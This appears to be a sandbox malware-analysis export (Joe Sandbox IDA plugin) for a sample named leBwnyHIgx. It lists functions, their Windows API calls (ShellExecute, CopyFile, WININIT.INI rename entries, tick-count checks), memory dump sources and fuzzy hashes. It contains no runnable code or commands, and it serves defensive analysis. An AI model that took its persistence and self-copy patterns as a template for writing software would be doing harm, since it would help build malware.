                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 68bf383cb7f79b99f340bdf26841dbaafbf7dd31d34f85d7c5e7cd938e48f808
                                                                                    • Instruction ID: 291e5d107d462672790c1edf6ff7d0cc3542d77857f31f2adbac887a00927ee5
                                                                                    • Opcode Fuzzy Hash: 68bf383cb7f79b99f340bdf26841dbaafbf7dd31d34f85d7c5e7cd938e48f808
                                                                                    • Instruction Fuzzy Hash: 17C117A2B102010BD714AE7DDC8476EBA999BC5316F18827FF214EB3D6DA7CDD058348
                                                                                    Function 00CE57F7 Relevance: 10.9, APIs: 7, Instructions: 357filesynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00CE5727: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00CE575A
                                                                                      • Part of subcall function 00CE56D7: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00CE56F5
                                                                                    • _Smanip.LIBCPMTD ref: 00CE5AE1
                                                                                    • _Smanip.LIBCPMTD ref: 00CE5B7B
                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00CE5CB8
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00CE5CD4
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00CE5CE1
                                                                                    • CopyFileA.KERNEL32(00000000,?,00000000), ref: 00CE5D4A
                                                                                    • ShellExecuteA.SHELL32(00000000,100185D4,?,00000000,00000000,00000001), ref: 00CE5D70
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_cd0000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$ExecuteModuleNameShellSmanip$CloseCopyHandleObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 2489516046-0
                                                                                    • Opcode ID: 0fe253082a74fc7e1f2c5e44154e34defa3da35614f529e5d97aba5e42ca8e7c
                                                                                    • Instruction ID: 5daa8f7e598b8f653a0ed2fd0d351a9f883ee7e4e463d4acc5aa280caedce6ee
                                                                                    • Opcode Fuzzy Hash: 0fe253082a74fc7e1f2c5e44154e34defa3da35614f529e5d97aba5e42ca8e7c
                                                                                    • Instruction Fuzzy Hash: B8024270D083D8DEEB11DBA4C859BDDBFB16F25304F0441D9D1496B282DBBA1B88DB62
                                                                                    Function 005F8EF4 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 216COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 005F8FDA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: PrivateProfileStringWrite
                                                                                    • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                    • API String ID: 390214022-3304407042
                                                                                    • Opcode ID: 72d01abfe8e5969de7e26bb812fea71a54af99fa0a185ea00ff7a95313d2a991
                                                                                    • Instruction ID: 2223d5580d9881282453f8846468d4fa0c2eade89701c8d1d1552e55bc4b479c
                                                                                    • Opcode Fuzzy Hash: 72d01abfe8e5969de7e26bb812fea71a54af99fa0a185ea00ff7a95313d2a991
                                                                                    • Instruction Fuzzy Hash: A6811E34A0060DAFDF10EBA4C986BEEBBB5FF88304F504465E600B7291DB79AE45CB55
                                                                                    Function 10011CD0 Relevance: 10.7, APIs: 7, Instructions: 190COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011CF2
                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011CFF
                                                                                    • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011D0A
                                                                                    • ?_Gninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 10011D17
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?egptr@?$basic_streambuf@Gninc@?$basic_streambuf@
                                                                                    • String ID:
                                                                                    • API String ID: 623893373-0
                                                                                    • Opcode ID: 81848bf548e36ae40d1474d4182290775761bbf9aa87b0d71a2db3e462fd0b45
                                                                                    • Instruction ID: a0288be0b98a9ca1868d6d550198ab6d9a445e2d27cbf722241acd90e910a963
                                                                                    • Opcode Fuzzy Hash: 81848bf548e36ae40d1474d4182290775761bbf9aa87b0d71a2db3e462fd0b45
                                                                                    • Instruction Fuzzy Hash: 23716AB5C1021DDFDB18DFE4D8959EEB7B1FF04250F104129E516AB291EB30AE85CBA1
                                                                                    Function 00407368 Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00407828: GetCurrentThreadId.KERNEL32 ref: 0040782B
                                                                                    • GetTickCount.KERNEL32 ref: 0040739F
                                                                                    • GetTickCount.KERNEL32 ref: 004073B7
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004073E6
                                                                                    • GetTickCount.KERNEL32 ref: 00407411
                                                                                    • GetTickCount.KERNEL32 ref: 00407448
                                                                                    • GetTickCount.KERNEL32 ref: 00407472
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004074E2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountTick$CurrentThread
                                                                                    • String ID:
                                                                                    • API String ID: 3968769311-0
                                                                                    • Opcode ID: fa560ec336dd6435e73473a6e2aefd0ccb444b59d075b010f8b419752d8e835c
                                                                                    • Instruction ID: 7eaf3b8bd419559424612c501055e418296922ef1fbe2de70383ecb09e47f5c1
                                                                                    • Opcode Fuzzy Hash: fa560ec336dd6435e73473a6e2aefd0ccb444b59d075b010f8b419752d8e835c
                                                                                    • Instruction Fuzzy Hash: 67414F71A0C3559ED721AE38C48431FBFD1AB80354F14893EE8D8973C2E778A8859757
                                                                                    Function 10011B60 Relevance: 10.6, APIs: 7, Instructions: 124COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J@Z.MSVCP140(?,?,00000000), ref: 10011B98
                                                                                    • ?_Gnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 10011BB8
                                                                                    • _Min_value.LIBCPMTD ref: 10011BCF
                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?), ref: 10011BE3
                                                                                    • ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 10011C0F
                                                                                    • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000FFF,00000000), ref: 10011C4D
                                                                                    • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,00000000), ref: 10011C9E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: D@std@@@std@@U?$char_traits@$fread$?gbump@?$basic_streambuf@?gptr@?$basic_streambuf@?xsgetn@?$basic_streambuf@Gnavail@?$basic_streambuf@Min_value
                                                                                    • String ID:
                                                                                    • API String ID: 1591557727-0
                                                                                    • Opcode ID: d4fc38bd5d27632a969096010cf362d5f07236698e0cba18835fbb4ee552d5b6
                                                                                    • Instruction ID: e0e71f9b7f058a59da033de4bce7e27fb15f803cdd6c81aee40a3e1b4d5913a5
                                                                                    • Opcode Fuzzy Hash: d4fc38bd5d27632a969096010cf362d5f07236698e0cba18835fbb4ee552d5b6
                                                                                    • Instruction Fuzzy Hash: CF51C775E00109EFDB48CF98C984AEEBBB5FF88344F108169E905AB354D730AE85DB90
                                                                                    Function 005A2DDC Relevance: 10.6, APIs: 7, Instructions: 105windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 005A2DF0
                                                                                    • IsWindowUnicode.USER32 ref: 005A2E04
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005A2E27
                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 005A2E3D
                                                                                    • TranslateMessage.USER32 ref: 005A2EC2
                                                                                    • DispatchMessageW.USER32 ref: 005A2ECF
                                                                                    • DispatchMessageA.USER32 ref: 005A2ED7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2190272339-0
                                                                                    • Opcode ID: fd761d7266132de43e7474990c2049500dae5730ede02df76ae55a535cf0bf77
                                                                                    • Instruction ID: d2fd1ee5a8e11b9fb307f93f8c6e517243e3696a9ac5cec3ed267a911c5f8ddb
                                                                                    • Opcode Fuzzy Hash: fd761d7266132de43e7474990c2049500dae5730ede02df76ae55a535cf0bf77
                                                                                    • Instruction Fuzzy Hash: AB21D63034434176EB31A92D0D47BBFAF9E6F97748F24441EF481DB282CAD698D68226
                                                                                    Function 005B2830 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91windowregistryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetActiveWindow.USER32 ref: 005B285F
                                                                                    • GetFocus.USER32 ref: 005B2867
                                                                                    • RegisterClassW.USER32(00661834), ref: 005B2888
                                                                                    • ShowWindow.USER32(00000000,00000008,00000000,00400000,00000000,41146400,00000000,00000000,00000000,00000000,80000000,00000000,00400000,00000000,00000000,00000000), ref: 005B2920
                                                                                    • SetFocus.USER32(00000000,00000000,005B2942,?,?,?,00000001,00000000,?,00619EC3,0066978C,?,00650D35,?,?,00000000), ref: 005B2927
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FocusWindow$ActiveClassRegisterShow
                                                                                    • String ID: TWindowDisabler-Window
                                                                                    • API String ID: 495420250-1824977358
                                                                                    • Opcode ID: dc80fc215540cc4eafb9e960a5d421e476d6a1d8b1644f478aa1b5a7317f9f00
                                                                                    • Instruction ID: d82140f50c977c4be84b76ca69f426c0dffd831fcdb5b5c939c24f55dbe8d353
                                                                                    • Opcode Fuzzy Hash: dc80fc215540cc4eafb9e960a5d421e476d6a1d8b1644f478aa1b5a7317f9f00
                                                                                    • Instruction Fuzzy Hash: 1921D171B10701ABE320EF65DD02F9A7AE5FB45B04F504529F904FB2D0EAB8BC9087A5
                                                                                    Function 10016571 Relevance: 10.6, APIs: 7, Instructions: 87COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: dllmain_raw$Main@12dllmain_crt_dispatch
                                                                                    • String ID:
                                                                                    • API String ID: 3353612457-0
                                                                                    • Opcode ID: 98b3f14604f10840f3c0567c90b7ef5983de27fd412168009cf08e435744699c
                                                                                    • Instruction ID: 54edc5666c311e175fc24a18419b6af998dcce978129f85e44b2e6ec709a6a51
                                                                                    • Opcode Fuzzy Hash: 98b3f14604f10840f3c0567c90b7ef5983de27fd412168009cf08e435744699c
                                                                                    • Instruction Fuzzy Hash: E6216DB2D01669ABDB21CF55DD41E6E3AA9EB8CAD0F014129F8146F255C231DE819BE0
                                                                                    Function 0063DBC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 72fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 0063DBEC
                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 0063DC05
                                                                                    • CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 0063DC2F
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0063DC4D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileHandle$AttributesCloseCreateModule
                                                                                    • String ID: GetFinalPathNameByHandleW$kernel32.dll
                                                                                    • API String ID: 791737717-340263132
                                                                                    • Opcode ID: 904617a2e49037e787060e302256d2bfdad1cab1979f73791d96504fdcffd84e
                                                                                    • Instruction ID: 6026778cd775b34b266e918d1895d9f5e5aeea77bfc3c582f4084562949ce8b5
                                                                                    • Opcode Fuzzy Hash: 904617a2e49037e787060e302256d2bfdad1cab1979f73791d96504fdcffd84e
                                                                                    • Instruction Fuzzy Hash: AD11A9A175030526E62032AA6CC7FBBA14E8B51758F14023ABA54D72D2EDD99D4282DA
                                                                                    Function 005B8F18 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 005B8F29
                                                                                      • Part of subcall function 004DD0C0: EnterCriticalSection.KERNEL32(?,00000000,004DD32F,?,?), ref: 004DD108
                                                                                    • SelectObject.GDI32(006125F0,00000000), ref: 005B8F4B
                                                                                    • GetTextExtentPointW.GDI32(006125F0,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 005B8F5F
                                                                                    • GetTextMetricsW.GDI32(006125F0,?), ref: 005B8F81
                                                                                    • ReleaseDC.USER32(00000000,006125F0), ref: 005B8F9E
                                                                                    Strings
                                                                                    • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 005B8F56
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Text$CriticalEnterExtentMetricsObjectPointReleaseSectionSelect
                                                                                    • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                    • API String ID: 1334710084-222967699
                                                                                    • Opcode ID: 958775d07e3e9b45620c2f21b6b018f80563130afb076ad44b94cc2abff4fe22
                                                                                    • Instruction ID: 51f75fe6070d711ca219fc08ac8bc05be8c07b0fd7becc7a938aa07a23ceff98
                                                                                    • Opcode Fuzzy Hash: 958775d07e3e9b45620c2f21b6b018f80563130afb076ad44b94cc2abff4fe22
                                                                                    • Instruction Fuzzy Hash: 28016D76B14608AFDB01DBE9CD41EEEB7BDEB49714F500466BA00D3281DAB8AD10C764
                                                                                    Function 004083B0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000), ref: 004083E9
                                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000), ref: 004083EF
                                                                                    • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000), ref: 0040840A
                                                                                    • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000), ref: 00408410
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileHandleWrite
                                                                                    • String ID: Error$Runtime error at 00000000
                                                                                    • API String ID: 3320372497-2970929446
                                                                                    • Opcode ID: 92e6fdd24f1f60eb182b72c0aadb941e414bd13305f3c1d9f226be0fde595ab1
                                                                                    • Instruction ID: 8a17602c2e75a12023cfcc5c7f70c251d3057b547bf485000fb7f9983d30ebe3
                                                                                    • Opcode Fuzzy Hash: 92e6fdd24f1f60eb182b72c0aadb941e414bd13305f3c1d9f226be0fde595ab1
                                                                                    • Instruction Fuzzy Hash: 1AF046B0640341B9E720BB616D07F1A3A4D4740F26F00053FF550B93C2DEFA4A88836D
